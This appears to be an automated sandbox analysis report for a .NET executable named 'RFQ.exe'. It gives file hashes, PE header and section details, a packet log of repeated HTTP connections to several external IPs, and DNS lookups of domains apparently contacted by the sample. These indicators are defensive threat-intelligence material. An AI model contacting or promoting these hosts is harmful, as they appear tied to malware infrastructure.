                                                                                                      Entropy (8bit):7.785777316180597
                                                                                                      TrID:
                                                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                      • DOS Executable Generic (2002/1) 0.01%
                                                                                                      File name:RFQ.exe
                                                                                                      File size:820'224 bytes
                                                                                                      MD5:4d82cc1b35b8dc9ec7d149f1b8b95e95
                                                                                                      SHA1:a1d363742603070b3fc7d2db4fc431307618b1b8
                                                                                                      SHA256:eedd6d6a9ec4bf82ca87e66c1ae5b86983e8479598df71f3602283b93dd07035
                                                                                                      SHA512:4551b327f1b1fe4bc7e915898cc5eb1f89b5d0ccfe4c714591cb83fffed7d1c508071248c8c54cb0ce5e66ad800641e6b1b37496ce1a34b5c5814d7fe044334a
                                                                                                      SSDEEP:24576:D29ueLM9QItbS+57TPtSr2h3POtV3lAiwN:D29ueL6tbV57jtSrUPUw
                                                                                                      TLSH:9205F1586ABB9F2ADAFE43F68522182407F1B25F7221E35F4FC6A0D95814FC40952F63
                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....-.f.................z..........^.... ........@.. ....................................@................................
                                                                                                      Icon Hash:00928e8e8686b000
                                                                                                      Entrypoint:0x4c985e
                                                                                                      Entrypoint Section:.text
                                                                                                      Digitally signed:false
                                                                                                      Imagebase:0x400000
                                                                                                      Subsystem:windows gui
                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                      Time Stamp:0x661E2DA6 [Tue Apr 16 07:49:58 2024 UTC]
                                                                                                      TLS Callbacks:
                                                                                                      CLR (.Net) Version:
                                                                                                      OS Version Major:4
                                                                                                      OS Version Minor:0
                                                                                                      File Version Major:4
                                                                                                      File Version Minor:0
                                                                                                      Subsystem Version Major:4
                                                                                                      Subsystem Version Minor:0
                                                                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                      Instruction
                                                                                                      jmp dword ptr [00402000h]
                                                                                                      add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xc9808 | 0x53 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xca000 | 0x600 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xcc000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xc7864 | 0xc7a00 | 6d21c3711f3040f8ab6d5efd1fbb1193 | False | 0.8848634646994364 | data | 7.793030920225636 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xca000 | 0x600 | 0x600 | 4f4d85abf16d5b538b0ba1d780db1df5 | False | 0.4225260416666667 | data | 4.07542218621942 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xcc000 | 0xc | 0x200 | d462cb3f75d9bb7fc9f1043e445f002f | False | 0.044921875 | data | 0.09800417566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0xca090 | 0x31c | data | | | 0.43467336683417085
RT_MANIFEST | 0xca3bc | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347

DLL | Import
mscoree.dll | _CorExeMain
                                                                                                      Apr 16, 2024 12:00:51.419419050 CEST804974075.2.60.5192.168.2.5
                                                                                                      Apr 16, 2024 12:00:51.419481039 CEST804974075.2.60.5192.168.2.5
                                                                                                      Apr 16, 2024 12:00:51.419518948 CEST804974075.2.60.5192.168.2.5
                                                                                                      Apr 16, 2024 12:00:51.419558048 CEST804974075.2.60.5192.168.2.5
                                                                                                      Apr 16, 2024 12:00:51.419565916 CEST4974080192.168.2.575.2.60.5
                                                                                                      Apr 16, 2024 12:00:51.419656038 CEST4974080192.168.2.575.2.60.5
                                                                                                      Apr 16, 2024 12:00:51.423152924 CEST804974075.2.60.5192.168.2.5
                                                                                                      Apr 16, 2024 12:00:51.423204899 CEST4974080192.168.2.575.2.60.5
                                                                                                      Apr 16, 2024 12:00:52.783456087 CEST4974080192.168.2.575.2.60.5
                                                                                                      Apr 16, 2024 12:00:53.800896883 CEST4974180192.168.2.575.2.60.5
                                                                                                      Apr 16, 2024 12:00:53.904999971 CEST804974175.2.60.5192.168.2.5
                                                                                                      Apr 16, 2024 12:00:53.910963058 CEST4974180192.168.2.575.2.60.5
                                                                                                      Apr 16, 2024 12:00:53.910963058 CEST4974180192.168.2.575.2.60.5
                                                                                                      Apr 16, 2024 12:00:54.014940977 CEST804974175.2.60.5192.168.2.5
                                                                                                      Apr 16, 2024 12:00:54.031459093 CEST804974175.2.60.5192.168.2.5
                                                                                                      Apr 16, 2024 12:00:54.031506062 CEST804974175.2.60.5192.168.2.5
                                                                                                      Apr 16, 2024 12:00:54.031541109 CEST804974175.2.60.5192.168.2.5
                                                                                                      Apr 16, 2024 12:00:54.031577110 CEST804974175.2.60.5192.168.2.5
                                                                                                      Apr 16, 2024 12:00:54.034785986 CEST4974180192.168.2.575.2.60.5
                                                                                                      Apr 16, 2024 12:00:54.040241003 CEST804974175.2.60.5192.168.2.5
                                                                                                      Apr 16, 2024 12:00:54.044151068 CEST4974180192.168.2.575.2.60.5
                                                                                                      Apr 16, 2024 12:00:55.424025059 CEST4974180192.168.2.575.2.60.5
                                                                                                      Apr 16, 2024 12:00:56.440077066 CEST4974280192.168.2.575.2.60.5
                                                                                                      Apr 16, 2024 12:00:56.543940067 CEST804974275.2.60.5192.168.2.5
                                                                                                      Apr 16, 2024 12:00:56.544101000 CEST4974280192.168.2.575.2.60.5
                                                                                                      Apr 16, 2024 12:00:56.544807911 CEST4974280192.168.2.575.2.60.5
                                                                                                      Apr 16, 2024 12:00:56.648570061 CEST804974275.2.60.5192.168.2.5
                                                                                                      Apr 16, 2024 12:00:56.648614883 CEST804974275.2.60.5192.168.2.5
                                                                                                      Apr 16, 2024 12:00:56.665306091 CEST804974275.2.60.5192.168.2.5
                                                                                                      Apr 16, 2024 12:00:56.665348053 CEST804974275.2.60.5192.168.2.5
                                                                                                      Apr 16, 2024 12:00:56.665383101 CEST804974275.2.60.5192.168.2.5
                                                                                                      Apr 16, 2024 12:00:56.665411949 CEST4974280192.168.2.575.2.60.5
                                                                                                      Apr 16, 2024 12:00:56.665417910 CEST804974275.2.60.5192.168.2.5
                                                                                                      Apr 16, 2024 12:00:56.665911913 CEST4974280192.168.2.575.2.60.5
                                                                                                      Apr 16, 2024 12:00:56.671289921 CEST804974275.2.60.5192.168.2.5
                                                                                                      Apr 16, 2024 12:00:56.671334028 CEST4974280192.168.2.575.2.60.5
                                                                                                      Apr 16, 2024 12:00:58.052334070 CEST4974280192.168.2.575.2.60.5
                                                                                                      Apr 16, 2024 12:00:59.065254927 CEST4974380192.168.2.575.2.60.5
                                                                                                      Apr 16, 2024 12:00:59.169473886 CEST804974375.2.60.5192.168.2.5
                                                                                                      Apr 16, 2024 12:00:59.169594049 CEST4974380192.168.2.575.2.60.5
                                                                                                      Apr 16, 2024 12:00:59.169714928 CEST4974380192.168.2.575.2.60.5
                                                                                                      Apr 16, 2024 12:00:59.273524046 CEST804974375.2.60.5192.168.2.5
                                                                                                      Apr 16, 2024 12:00:59.290175915 CEST804974375.2.60.5192.168.2.5
                                                                                                      Apr 16, 2024 12:00:59.290239096 CEST804974375.2.60.5192.168.2.5
                                                                                                      Apr 16, 2024 12:00:59.290275097 CEST804974375.2.60.5192.168.2.5
                                                                                                      Apr 16, 2024 12:00:59.290314913 CEST804974375.2.60.5192.168.2.5
                                                                                                      Apr 16, 2024 12:00:59.290380955 CEST4974380192.168.2.575.2.60.5
                                                                                                      Apr 16, 2024 12:00:59.290380955 CEST4974380192.168.2.575.2.60.5
                                                                                                      Apr 16, 2024 12:00:59.290494919 CEST4974380192.168.2.575.2.60.5
                                                                                                      Apr 16, 2024 12:00:59.297668934 CEST804974375.2.60.5192.168.2.5
                                                                                                      Apr 16, 2024 12:00:59.297724962 CEST4974380192.168.2.575.2.60.5
                                                                                                      Apr 16, 2024 12:00:59.396146059 CEST804974375.2.60.5192.168.2.5
                                                                                                      Apr 16, 2024 12:01:04.526765108 CEST4974480192.168.2.5203.161.50.128
                                                                                                      Apr 16, 2024 12:01:04.680305004 CEST8049744203.161.50.128192.168.2.5
                                                                                                      Apr 16, 2024 12:01:04.680532932 CEST4974480192.168.2.5203.161.50.128
                                                                                                      Apr 16, 2024 12:01:04.680532932 CEST4974480192.168.2.5203.161.50.128
                                                                                                      Apr 16, 2024 12:01:04.835591078 CEST8049744203.161.50.128192.168.2.5
                                                                                                      Apr 16, 2024 12:01:04.847704887 CEST8049744203.161.50.128192.168.2.5
                                                                                                      Apr 16, 2024 12:01:04.847744942 CEST8049744203.161.50.128192.168.2.5
                                                                                                      Apr 16, 2024 12:01:04.847784996 CEST8049744203.161.50.128192.168.2.5
                                                                                                      Apr 16, 2024 12:01:04.847825050 CEST8049744203.161.50.128192.168.2.5
                                                                                                      Apr 16, 2024 12:01:04.847848892 CEST4974480192.168.2.5203.161.50.128
                                                                                                      Apr 16, 2024 12:01:04.847989082 CEST8049744203.161.50.128192.168.2.5
                                                                                                      Apr 16, 2024 12:01:04.848026037 CEST8049744203.161.50.128192.168.2.5
                                                                                                      Apr 16, 2024 12:01:04.848063946 CEST4974480192.168.2.5203.161.50.128
                                                                                                      Apr 16, 2024 12:01:04.848063946 CEST4974480192.168.2.5203.161.50.128
                                                                                                      Apr 16, 2024 12:01:04.848124981 CEST8049744203.161.50.128192.168.2.5
                                                                                                      Apr 16, 2024 12:01:04.848161936 CEST8049744203.161.50.128192.168.2.5
                                                                                                      Apr 16, 2024 12:01:04.848339081 CEST8049744203.161.50.128192.168.2.5
                                                                                                      Apr 16, 2024 12:01:04.848373890 CEST8049744203.161.50.128192.168.2.5
                                                                                                      Apr 16, 2024 12:01:04.848407984 CEST8049744203.161.50.128192.168.2.5
                                                                                                      Apr 16, 2024 12:01:04.848408937 CEST4974480192.168.2.5203.161.50.128
                                                                                                      Apr 16, 2024 12:01:04.848408937 CEST4974480192.168.2.5203.161.50.128
                                                                                                      Apr 16, 2024 12:01:04.850763083 CEST4974480192.168.2.5203.161.50.128
                                                                                                      Apr 16, 2024 12:01:06.190316916 CEST4974480192.168.2.5203.161.50.128
                                                                                                      Apr 16, 2024 12:01:07.205703020 CEST4974580192.168.2.5203.161.50.128
                                                                                                      Apr 16, 2024 12:01:07.362415075 CEST8049745203.161.50.128192.168.2.5
                                                                                                      Apr 16, 2024 12:01:07.362612963 CEST4974580192.168.2.5203.161.50.128
                                                                                                      Apr 16, 2024 12:01:07.362704992 CEST4974580192.168.2.5203.161.50.128
                                                                                                      Apr 16, 2024 12:01:07.521301031 CEST8049745203.161.50.128192.168.2.5
                                                                                                      Apr 16, 2024 12:01:07.532691002 CEST8049745203.161.50.128192.168.2.5
                                                                                                      Apr 16, 2024 12:01:07.532733917 CEST8049745203.161.50.128192.168.2.5
                                                                                                      Apr 16, 2024 12:01:07.532773018 CEST8049745203.161.50.128192.168.2.5
                                                                                                      Apr 16, 2024 12:01:07.532813072 CEST8049745203.161.50.128192.168.2.5
                                                                                                      Apr 16, 2024 12:01:07.532852888 CEST8049745203.161.50.128192.168.2.5
                                                                                                      Apr 16, 2024 12:01:07.532890081 CEST8049745203.161.50.128192.168.2.5
                                                                                                      Apr 16, 2024 12:01:07.532903910 CEST4974580192.168.2.5203.161.50.128
                                                                                                      Apr 16, 2024 12:01:07.532905102 CEST4974580192.168.2.5203.161.50.128
                                                                                                      Apr 16, 2024 12:01:07.532928944 CEST8049745203.161.50.128192.168.2.5
                                                                                                      Apr 16, 2024 12:01:07.532969952 CEST8049745203.161.50.128192.168.2.5
                                                                                                      Apr 16, 2024 12:01:07.532979012 CEST4974580192.168.2.5203.161.50.128
                                                                                                      Apr 16, 2024 12:01:07.533013105 CEST4974580192.168.2.5203.161.50.128
                                                                                                      Apr 16, 2024 12:01:07.533127069 CEST8049745203.161.50.128192.168.2.5
                                                                                                      Apr 16, 2024 12:01:07.533163071 CEST8049745203.161.50.128192.168.2.5
                                                                                                      Apr 16, 2024 12:01:07.533207893 CEST4974580192.168.2.5203.161.50.128
                                                                                                      Apr 16, 2024 12:01:07.533297062 CEST8049745203.161.50.128192.168.2.5
                                                                                                      Apr 16, 2024 12:01:07.533350945 CEST4974580192.168.2.5203.161.50.128
                                                                                                      Apr 16, 2024 12:01:08.877403975 CEST4974580192.168.2.5203.161.50.128
                                                                                                      Apr 16, 2024 12:01:09.898906946 CEST4974680192.168.2.5203.161.50.128
                                                                                                      Apr 16, 2024 12:01:10.054445028 CEST8049746203.161.50.128192.168.2.5
                                                                                                      Apr 16, 2024 12:01:10.055140972 CEST4974680192.168.2.5203.161.50.128
                                                                                                      Apr 16, 2024 12:01:10.055141926 CEST4974680192.168.2.5203.161.50.128
                                                                                                      Apr 16, 2024 12:01:10.212999105 CEST8049746203.161.50.128192.168.2.5
                                                                                                      Apr 16, 2024 12:01:10.223800898 CEST8049746203.161.50.128192.168.2.5
                                                                                                      Apr 16, 2024 12:01:10.223840952 CEST8049746203.161.50.128192.168.2.5
                                                                                                      Apr 16, 2024 12:01:10.223877907 CEST8049746203.161.50.128192.168.2.5
                                                                                                      Apr 16, 2024 12:01:10.223916054 CEST8049746203.161.50.128192.168.2.5
                                                                                                      Apr 16, 2024 12:01:10.223953009 CEST8049746203.161.50.128192.168.2.5
                                                                                                      Apr 16, 2024 12:01:10.223989964 CEST8049746203.161.50.128192.168.2.5
                                                                                                      Apr 16, 2024 12:01:10.224159002 CEST8049746203.161.50.128192.168.2.5
                                                                                                      Apr 16, 2024 12:01:10.224195957 CEST8049746203.161.50.128192.168.2.5
                                                                                                      Apr 16, 2024 12:01:10.224297047 CEST4974680192.168.2.5203.161.50.128
                                                                                                      Apr 16, 2024 12:01:10.224404097 CEST8049746203.161.50.128192.168.2.5
                                                                                                      Apr 16, 2024 12:01:10.224438906 CEST8049746203.161.50.128192.168.2.5
                                                                                                      Apr 16, 2024 12:01:10.224471092 CEST8049746203.161.50.128192.168.2.5
                                                                                                      Apr 16, 2024 12:01:10.224517107 CEST4974680192.168.2.5203.161.50.128
                                                                                                      Apr 16, 2024 12:01:10.228152037 CEST4974680192.168.2.5203.161.50.128
                                                                                                      Apr 16, 2024 12:01:11.564764977 CEST4974680192.168.2.5203.161.50.128
                                                                                                      Apr 16, 2024 12:01:12.582911015 CEST4974780192.168.2.5203.161.50.128
                                                                                                      Apr 16, 2024 12:01:12.739422083 CEST8049747203.161.50.128192.168.2.5
                                                                                                      Apr 16, 2024 12:01:12.739523888 CEST4974780192.168.2.5203.161.50.128
                                                                                                      Apr 16, 2024 12:01:12.739690065 CEST4974780192.168.2.5203.161.50.128
                                                                                                      Apr 16, 2024 12:01:12.893208981 CEST8049747203.161.50.128192.168.2.5
                                                                                                      Apr 16, 2024 12:01:12.904314041 CEST8049747203.161.50.128192.168.2.5
                                                                                                      Apr 16, 2024 12:01:12.904356956 CEST8049747203.161.50.128192.168.2.5
                                                                                                      Apr 16, 2024 12:01:12.904393911 CEST8049747203.161.50.128192.168.2.5
                                                                                                      Apr 16, 2024 12:01:12.904434919 CEST8049747203.161.50.128192.168.2.5
                                                                                                      Apr 16, 2024 12:01:12.904465914 CEST4974780192.168.2.5203.161.50.128
                                                                                                      Apr 16, 2024 12:01:12.904551029 CEST4974780192.168.2.5203.161.50.128
                                                                                                      Apr 16, 2024 12:01:12.904659033 CEST8049747203.161.50.128192.168.2.5
                                                                                                      Apr 16, 2024 12:01:12.904697895 CEST8049747203.161.50.128192.168.2.5
                                                                                                      Apr 16, 2024 12:01:12.904791117 CEST4974780192.168.2.5203.161.50.128
                                                                                                      Apr 16, 2024 12:01:12.905019999 CEST8049747203.161.50.128192.168.2.5
                                                                                                      Apr 16, 2024 12:01:12.905059099 CEST8049747203.161.50.128192.168.2.5
                                                                                                      Apr 16, 2024 12:01:12.905097008 CEST8049747203.161.50.128192.168.2.5
                                                                                                      Apr 16, 2024 12:01:12.905132055 CEST8049747203.161.50.128192.168.2.5
                                                                                                      Apr 16, 2024 12:01:12.905137062 CEST4974780192.168.2.5203.161.50.128
                                                                                                      Apr 16, 2024 12:01:12.905175924 CEST4974780192.168.2.5203.161.50.128
                                                                                                      Apr 16, 2024 12:01:12.905381918 CEST8049747203.161.50.128192.168.2.5
                                                                                                      Apr 16, 2024 12:01:12.905463934 CEST4974780192.168.2.5203.161.50.128
                                                                                                      Apr 16, 2024 12:01:12.905505896 CEST4974780192.168.2.5203.161.50.128
                                                                                                      Apr 16, 2024 12:01:13.058501959 CEST8049747203.161.50.128192.168.2.5
                                                                                                      Apr 16, 2024 12:01:18.508151054 CEST4974880192.168.2.5134.122.178.172
                                                                                                      Apr 16, 2024 12:01:18.841525078 CEST8049748134.122.178.172192.168.2.5
                                                                                                      Apr 16, 2024 12:01:18.841628075 CEST4974880192.168.2.5134.122.178.172
                                                                                                      Apr 16, 2024 12:01:18.841782093 CEST4974880192.168.2.5134.122.178.172
                                                                                                      Apr 16, 2024 12:01:19.175122023 CEST8049748134.122.178.172192.168.2.5
                                                                                                      Apr 16, 2024 12:01:19.203001976 CEST8049748134.122.178.172192.168.2.5
                                                                                                      Apr 16, 2024 12:01:19.203059912 CEST8049748134.122.178.172192.168.2.5
                                                                                                      Apr 16, 2024 12:01:19.203107119 CEST4974880192.168.2.5134.122.178.172
                                                                                                      Apr 16, 2024 12:01:20.346892118 CEST4974880192.168.2.5134.122.178.172
                                                                                                      Apr 16, 2024 12:01:21.361896038 CEST4974980192.168.2.5134.122.178.172
                                                                                                      Apr 16, 2024 12:01:21.695071936 CEST8049749134.122.178.172192.168.2.5
                                                                                                      Apr 16, 2024 12:01:21.695223093 CEST4974980192.168.2.5134.122.178.172
                                                                                                      Apr 16, 2024 12:01:21.695467949 CEST4974980192.168.2.5134.122.178.172
                                                                                                      Apr 16, 2024 12:01:22.027086973 CEST8049749134.122.178.172192.168.2.5
                                                                                                      Apr 16, 2024 12:01:22.047791004 CEST8049749134.122.178.172192.168.2.5
                                                                                                      Apr 16, 2024 12:01:22.047858953 CEST8049749134.122.178.172192.168.2.5
                                                                                                      Apr 16, 2024 12:01:22.048192024 CEST4974980192.168.2.5134.122.178.172
                                                                                                      Apr 16, 2024 12:01:22.048192024 CEST4974980192.168.2.5134.122.178.172
                                                                                                      Apr 16, 2024 12:01:23.206492901 CEST4974980192.168.2.5134.122.178.172
                                                                                                      Apr 16, 2024 12:01:24.222897053 CEST4975080192.168.2.5134.122.178.172
                                                                                                      Apr 16, 2024 12:01:24.562869072 CEST8049750134.122.178.172192.168.2.5
                                                                                                      Apr 16, 2024 12:01:24.563323975 CEST4975080192.168.2.5134.122.178.172
                                                                                                      Apr 16, 2024 12:01:24.563424110 CEST4975080192.168.2.5134.122.178.172
                                                                                                      Apr 16, 2024 12:02:54.274962902 CEST4976880192.168.2.5185.215.4.13
                                                                                                      Apr 16, 2024 12:02:54.276185989 CEST4976880192.168.2.5185.215.4.13
                                                                                                      Apr 16, 2024 12:02:54.396398067 CEST8049768185.215.4.13192.168.2.5
                                                                                                      Apr 16, 2024 12:02:54.524749041 CEST8049768185.215.4.13192.168.2.5
                                                                                                      Apr 16, 2024 12:02:54.524827957 CEST8049768185.215.4.13192.168.2.5
                                                                                                      Apr 16, 2024 12:02:54.526951075 CEST4976880192.168.2.5185.215.4.13
                                                                                                      Apr 16, 2024 12:02:55.783730030 CEST4976880192.168.2.5185.215.4.13
                                                                                                      Apr 16, 2024 12:02:56.799210072 CEST4976980192.168.2.5185.215.4.13
                                                                                                      Apr 16, 2024 12:02:56.919621944 CEST8049769185.215.4.13192.168.2.5
                                                                                                      Apr 16, 2024 12:02:56.919804096 CEST4976980192.168.2.5185.215.4.13
                                                                                                      Apr 16, 2024 12:02:56.919907093 CEST4976980192.168.2.5185.215.4.13
                                                                                                      Apr 16, 2024 12:02:57.040250063 CEST8049769185.215.4.13192.168.2.5
                                                                                                      Apr 16, 2024 12:02:57.183358908 CEST8049769185.215.4.13192.168.2.5
                                                                                                      Apr 16, 2024 12:02:57.183422089 CEST8049769185.215.4.13192.168.2.5
                                                                                                      Apr 16, 2024 12:02:57.183520079 CEST4976980192.168.2.5185.215.4.13
                                                                                                      Apr 16, 2024 12:02:58.424935102 CEST4976980192.168.2.5185.215.4.13
                                                                                                      Apr 16, 2024 12:02:59.736862898 CEST4977080192.168.2.5185.215.4.13
                                                                                                      Apr 16, 2024 12:02:59.856508970 CEST8049770185.215.4.13192.168.2.5
                                                                                                      Apr 16, 2024 12:02:59.856609106 CEST4977080192.168.2.5185.215.4.13
                                                                                                      Apr 16, 2024 12:02:59.856980085 CEST4977080192.168.2.5185.215.4.13
                                                                                                      Apr 16, 2024 12:02:59.977129936 CEST8049770185.215.4.13192.168.2.5
                                                                                                      Apr 16, 2024 12:03:00.126024961 CEST8049770185.215.4.13192.168.2.5
                                                                                                      Apr 16, 2024 12:03:00.126097918 CEST8049770185.215.4.13192.168.2.5
                                                                                                      Apr 16, 2024 12:03:00.126281977 CEST4977080192.168.2.5185.215.4.13
                                                                                                      Apr 16, 2024 12:03:01.361392975 CEST4977080192.168.2.5185.215.4.13
                                                                                                      Apr 16, 2024 12:03:02.378849983 CEST4977180192.168.2.5185.215.4.13
                                                                                                      Apr 16, 2024 12:03:02.499197960 CEST8049771185.215.4.13192.168.2.5
                                                                                                      Apr 16, 2024 12:03:02.499505997 CEST4977180192.168.2.5185.215.4.13
                                                                                                      Apr 16, 2024 12:03:02.499505997 CEST4977180192.168.2.5185.215.4.13
                                                                                                      Apr 16, 2024 12:03:02.619865894 CEST8049771185.215.4.13192.168.2.5
                                                                                                      Apr 16, 2024 12:03:02.758929014 CEST8049771185.215.4.13192.168.2.5
                                                                                                      Apr 16, 2024 12:03:02.758956909 CEST8049771185.215.4.13192.168.2.5
                                                                                                      Apr 16, 2024 12:03:02.759330034 CEST4977180192.168.2.5185.215.4.13
                                                                                                      Apr 16, 2024 12:03:02.759330988 CEST4977180192.168.2.5185.215.4.13
                                                                                                      Apr 16, 2024 12:03:03.080271006 CEST4977180192.168.2.5185.215.4.13
                                                                                                      Apr 16, 2024 12:03:03.199836016 CEST8049771185.215.4.13192.168.2.5
                                                                                                      Apr 16, 2024 12:03:18.971549034 CEST4977280192.168.2.5174.138.177.173
                                                                                                      Apr 16, 2024 12:03:19.095025063 CEST8049772174.138.177.173192.168.2.5
                                                                                                      Apr 16, 2024 12:03:19.095211029 CEST4977280192.168.2.5174.138.177.173
                                                                                                      Apr 16, 2024 12:03:19.095400095 CEST4977280192.168.2.5174.138.177.173
                                                                                                      Apr 16, 2024 12:03:19.218570948 CEST8049772174.138.177.173192.168.2.5
                                                                                                      Apr 16, 2024 12:03:19.218647003 CEST8049772174.138.177.173192.168.2.5
                                                                                                      Apr 16, 2024 12:03:19.218692064 CEST8049772174.138.177.173192.168.2.5
                                                                                                      Apr 16, 2024 12:03:19.218741894 CEST8049772174.138.177.173192.168.2.5
                                                                                                      Apr 16, 2024 12:03:19.218981981 CEST4977280192.168.2.5174.138.177.173
                                                                                                      Apr 16, 2024 12:03:19.218982935 CEST4977280192.168.2.5174.138.177.173
                                                                                                      Apr 16, 2024 12:03:19.219084024 CEST4977280192.168.2.5174.138.177.173
                                                                                                      Apr 16, 2024 12:03:19.342293024 CEST8049772174.138.177.173192.168.2.5
                                                                                                      Apr 16, 2024 12:03:24.222795010 CEST4977380192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 12:03:24.433579922 CEST804977391.195.240.117192.168.2.5
                                                                                                      Apr 16, 2024 12:03:24.433763981 CEST4977380192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 12:03:24.433867931 CEST4977380192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 12:03:24.647996902 CEST804977391.195.240.117192.168.2.5
                                                                                                      Apr 16, 2024 12:03:24.648032904 CEST804977391.195.240.117192.168.2.5
                                                                                                      Apr 16, 2024 12:03:24.648138046 CEST4977380192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 12:03:25.942806005 CEST4977380192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 12:03:26.955369949 CEST4977480192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 12:03:27.166718960 CEST804977491.195.240.117192.168.2.5
                                                                                                      Apr 16, 2024 12:03:27.166949987 CEST4977480192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 12:03:27.167047024 CEST4977480192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 12:03:27.378807068 CEST804977491.195.240.117192.168.2.5
                                                                                                      Apr 16, 2024 12:03:27.378825903 CEST804977491.195.240.117192.168.2.5
                                                                                                      Apr 16, 2024 12:03:27.378879070 CEST4977480192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 12:03:28.673981905 CEST4977480192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 12:03:29.689799070 CEST4977580192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 12:03:29.900912046 CEST804977591.195.240.117192.168.2.5
                                                                                                      Apr 16, 2024 12:03:29.900983095 CEST4977580192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 12:03:29.901143074 CEST4977580192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 12:03:30.112095118 CEST804977591.195.240.117192.168.2.5
                                                                                                      Apr 16, 2024 12:03:30.114063978 CEST804977591.195.240.117192.168.2.5
                                                                                                      Apr 16, 2024 12:03:30.114079952 CEST804977591.195.240.117192.168.2.5
                                                                                                      Apr 16, 2024 12:03:30.114125967 CEST4977580192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 12:03:31.408308983 CEST4977580192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 12:03:32.424096107 CEST4977680192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 12:03:32.635715961 CEST804977691.195.240.117192.168.2.5
                                                                                                      Apr 16, 2024 12:03:32.635921001 CEST4977680192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 12:03:32.635921001 CEST4977680192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 12:03:32.848392010 CEST804977691.195.240.117192.168.2.5
                                                                                                      Apr 16, 2024 12:03:32.848414898 CEST804977691.195.240.117192.168.2.5
                                                                                                      Apr 16, 2024 12:03:32.848575115 CEST4977680192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 12:03:32.848575115 CEST4977680192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 12:03:33.060328007 CEST804977691.195.240.117192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                                                                      Apr 16, 2024 12:02:11.477818966 CEST1.1.1.1192.168.2.50xe6baServer failure (2)www.drjoserizal.comnonenoneA (IP address)IN (0x0001)false
                                                                                                      Apr 16, 2024 12:02:19.190126896 CEST1.1.1.1192.168.2.50x2f33Server failure (2)www.drjoserizal.comnonenoneA (IP address)IN (0x0001)false
                                                                                                      Apr 16, 2024 12:02:19.190186977 CEST1.1.1.1192.168.2.50x2f33Server failure (2)www.drjoserizal.comnonenoneA (IP address)IN (0x0001)false
                                                                                                      Apr 16, 2024 12:02:19.190222025 CEST1.1.1.1192.168.2.50x2f33Server failure (2)www.drjoserizal.comnonenoneA (IP address)IN (0x0001)false
                                                                                                      Apr 16, 2024 12:02:19.190257072 CEST1.1.1.1192.168.2.50x2f33Server failure (2)www.drjoserizal.comnonenoneA (IP address)IN (0x0001)false
                                                                                                      Apr 16, 2024 12:02:20.311439037 CEST1.1.1.1192.168.2.50xe1d2Server failure (2)www.drjoserizal.comnonenoneA (IP address)IN (0x0001)false
                                                                                                      Apr 16, 2024 12:02:26.565226078 CEST1.1.1.1192.168.2.50x4ab4No error (0)www.myspinpods.com91.195.240.117A (IP address)IN (0x0001)false
